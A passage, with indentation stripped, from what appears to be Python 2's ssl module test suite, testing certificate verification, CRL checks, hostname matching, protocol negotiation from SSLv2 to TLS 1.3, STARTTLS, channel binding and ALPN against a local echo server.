sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
server = ThreadedEchoServer(SIGNED_CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=SIGNING_CA, chatty=False,
connectionchatty=False)
with server, \
closing(socket.socket()) as sock, \
closing(ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except socket.error as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# disable all but TLS 1.3
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], [
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
])
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
